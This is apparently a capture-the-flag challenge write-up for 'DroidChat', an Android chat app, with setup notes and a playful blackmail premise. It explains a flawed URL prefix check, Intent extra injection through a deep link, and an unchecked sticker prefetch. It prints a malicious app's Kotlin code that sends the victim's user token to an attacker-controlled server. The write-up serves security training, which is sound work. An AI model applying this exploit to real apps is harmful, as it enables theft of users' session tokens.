Welcome to Super App Store, where anyone can publish their apps!
Yeah, what a bunch of baloney. My app passed the review process a month ago! And I still haven't heard from them. Maybe this admin guy only lets his friends publish here?
Well, that's no matter now. I've decided I'm blackmailing him.
You're gonna help me with that. Here's the storefront. He uses that stupid DroidChat app he made himself. I know he must be keeping some secrets there...
App build is distributed on the storefront.
Deploy dev/app-backend
to a normal machine.
Deploy dev/runner
(front) to a normal machine.
Deploy dev/runner
(runner) to a KVM-capable machine.
- Install Android SDK, particularly system image that you wish to use (to
). Note thatgoogle_apis_playstore
does not have root access, so you'll want those ones. - Point
to front machine. Multiple runners are not supported.
Reversing the Android app, we should pay attention to following:
- The app has an
which attaches the user token as a query parameter to HTTPS requests to the API host. The check it performs, however, is faulty:
public final class d implements s {
// ...
public final a0 a(f fVar) {
// ...
if (j.N1(((r) wVar.f655b).f5334h, "https://droidchat-ab2f2aaa594034df.brics-ctf.ru", false)) {
q f7 = ((r) wVar.f655b).f();
String string = this.f2431a.f1797a.getString("token", null);
This is what Koltin turns Strings.startsWith
into. Obviously, a slash is missing at the end, so a URL like https://droidchat-...-ctf.ru@hacker.com
would pass the check.
DeepLinkActivity does not create a new Intent, instead modifying the received one. This allows us to sneak extras into ListActivity and ChatActvity.
ChatActivityArguments processes the Intent's extras with the following logic:
- If int extra
is present, try to open chat with this user ID. - If that failed, look at
bundle extra. IfChatActivityArguments.pendingSticker
is present, send the sticker first. Then open the chat with given user.
- If int extra
When a 'sticker' button is pressed in ListActivity, ChatActivity is started with a
. Looking at the UI, we can notice that the image is loaded before actually sending the message. And, in fact, no check is performed thatpendingSticker
is valid. This means that, if we could alterpendingSticker
, we could make abritrary GET requests (note that HTTPS is required). -
Looking at ListActivity, notice the unorthodox serialization of ChatActivityArguments into the Intent:
Intent intent = new Intent(listActivity2, ChatActivity.class);
User user2 = mVar2.f4045a;
y1.g.B(user2, "user");
Bundle bundle2 = new Bundle();
Bundle bundle3 = new Bundle();
bundle3.putInt("_User__id", user2.f6293a);
bundle3.putString("_User__username", user2.f6294b);
bundle2.putBundle("_ChatActivityArguments__user", bundle3);
Bundle bundle4 = new Bundle();
bundle4.putString("_Sticker__id", sticker.f6289a);
bundle4.putString("_Sticker__url", sticker.f6290b);
bundle2.putBundle("_ChatActivityArguments__pendingSticker", bundle4);
intent.putExtra("args", bundle2);
We can easily craft this data in our malicious app and deliver it via a deep link Intent.
Taking all of this into account, here is the MainActivity of our malicious app:
package ru.superappstore.newapp
import android.content.Intent
import android.net.Uri
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
class MainActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
startActivity(Intent().apply {
data = Uri.parse("droidchat://chat/-1234")
putExtra("args", Bundle().apply {
putBundle("_ChatActivityArguments__user", Bundle().apply {
putInt("_User__id", 11)
putString("_User__username", "get pwned")
putBundle("_ChatActivityArguments__pendingSticker", Bundle().apply {
putString("_Sticker__id", "owo")
putString("_Sticker__url", "https://droidchat-ab2f2aaa594034df.brics-ctf.ru@<YOUR_SERVER_HERE!>/")
When DroidChat starts with this Intent, dl.chat.uid
is set to -1234
, a nonexistent ID. ChatActivity thus fails to load the linked chat. It then tries to process ChatActivityArguments, and leaks the user token while trying to prefetch the sticker image.
-- app backend -
-- exploit submitter
Backend -- No, Submitter -- Yes